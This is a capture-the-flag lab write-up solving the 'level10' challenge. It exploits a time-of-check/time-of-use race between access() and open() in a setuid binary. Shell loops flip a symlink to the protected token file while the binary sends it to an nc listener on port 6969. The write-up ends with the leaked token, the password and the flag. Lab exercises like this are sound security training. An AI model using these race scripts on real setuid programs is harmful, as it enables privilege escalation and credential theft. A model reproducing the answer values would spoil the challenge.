Inside the home folder, we can find two files owned by `flag10` user.

Command: `ls -l`  
Output:
```
total 16
-rwsr-sr-x+ 1 flag10 level10 10817 Mar  5  2016 level10
-rw-------  1 flag10 flag10     26 Mar  5  2016 token
```

`level10` user doesn't have permissions to open `token` file

`level10` program takes two arguments - filename and IP address. Internally it checks that the user has access to file and that someone listening IP on port `6969`. The program use `access` system call which checks user permission, so trick with a simple link here doesn't work because `access` dereferences it before the check.

`level10` binary has permission to open `token` file, but `access` syscall checks that current user `level10` has permissions on it.

After a long time and hundreds of tries, I found that there is a problem with race conditions with symbolic links. Because there are some time betwen `access` and `open` call, we simply can change link after firts check and then `open` will open `token` file. 

Open additional terminal for output listening `nc -lk 6969`.

In the main terminal, I create two `shell` script files.

This script will create an empty file `test`, and then in the loop will change `link` pointing.
```
#!/bin/sh

touch test # create empty file
while [ true ]
do
    ln -sf test link
    ln -sf ~/token link
done
```
Command: `./linkin.sh &` - run it in background.

This one will continuously run your program.
```
#!/bin/sh
while [ true ]
do
   ~/level10 link 127.0.0.1
done
```


In seccond terminal we cas see, that time to time `level10` send content of `token` file.
```
.*( )*.
.*( )*.
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
.*( )*.
.*( )*.
.*( )*.
```

User: `flag10`  
Password: `woupa2yuojeeaaed06riuj63c`

Flag: `feulo4b72j7edeahuete3no7c`